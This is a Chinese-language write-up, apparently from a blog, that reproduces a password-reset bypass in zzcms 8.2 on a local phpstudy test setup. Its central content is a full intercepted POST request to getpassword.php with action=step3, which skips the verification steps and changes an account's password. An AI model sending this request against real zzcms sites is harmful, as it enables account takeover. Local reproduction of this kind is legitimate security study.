环境:
Web: phpstudy
System: Windows 10x64
源码版本为:zzcms 8.2
漏洞详情
1、环境的搭建
![](https://img.haomeiwen.com/i9272355/491aca3b65d8e193.png)
2、创建数据库
![](https://img.haomeiwen.com/i9272355/da1f4f51bff6b14c.png)
3、测试是否可以访问
![](https://img.haomeiwen.com/i9272355/5ac9559ebc2974c7.png)
本地复现开始
1、首先先注册个账号,然后首页点击找回密码
![](https://img.haomeiwen.com/i9272355/ae8ea0cbdf00cbed.png)
2、然后退出点找回密码链接:http://127.0.0.1/one/getpassword.php
3、用burp抓包:
![](https://img.haomeiwen.com/i9272355/0bad187b89361fe6.png)
4、设置Payload
POST /one/getpassword.php HTTP/1.1
Host: 127.0.0.1
Proxy-Connection: keep-alive
Content-Length: 91
Cache-Control: max-age=0
Origin: http://127.0.0.1
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://127.0.0.1/one/getpassword.php
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: timezone=8; PHPSESSID=e9nqsiqk95ilvgt98uogkp7fc6; BkGOp9578O_think_template=default; bdshare_firstime=1534304509497
Connection: close
Upgrade-Insecure-Requests: 1
password=test&action=step3&submit=%E4%B8%8B%E4%B8%80%E6%AD%A5
5、继续Forward,账号修改成功
![](https://img.haomeiwen.com/i9272355/113a370a054ee0b7.png)
网友评论